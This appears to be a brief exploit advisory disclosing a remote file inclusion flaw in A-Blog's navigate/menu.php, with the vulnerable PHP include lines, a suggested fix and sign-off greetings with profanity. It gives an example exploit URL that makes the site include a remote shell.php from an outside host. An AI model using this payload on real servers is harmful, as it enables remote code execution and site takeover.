A-Blog suffers from a flaw that allows for remote file inclusion.
1077d5570f91f0cc564ced7475bf18b618b5bb275d07873b4d21b2b2e7fe39b0
#
#[1]A-Blog Remote File Include
#
#BuG FounD by Drago84
#
#Application Affect:[2]A-Blog
#Source Code:
#[3]http://prdownloads.sourceforge.net/a-blog/A-BlogV2.rar?download
#Problem:
#<?php include ("$navigation_start"); ?>
#<?php include("$navigation_middle"); ?>
#Soluction:
#Include in page require ("mainfile.php");
#Page Vulnerable : menu.php
#Dir : /navigate/
# Exempe Of ExPloit
is:
#[4]http://www.site.com/ablog_dir/navigate/menu.php?navigation_start=[
5]http://marcusbestlamer.gay/shell.php?
#GrEatZ All Member of ToXiC, Str0ke
# Fuck Sonic,a|x
# ToXic Security Italian CreW
######
ToXiC
###################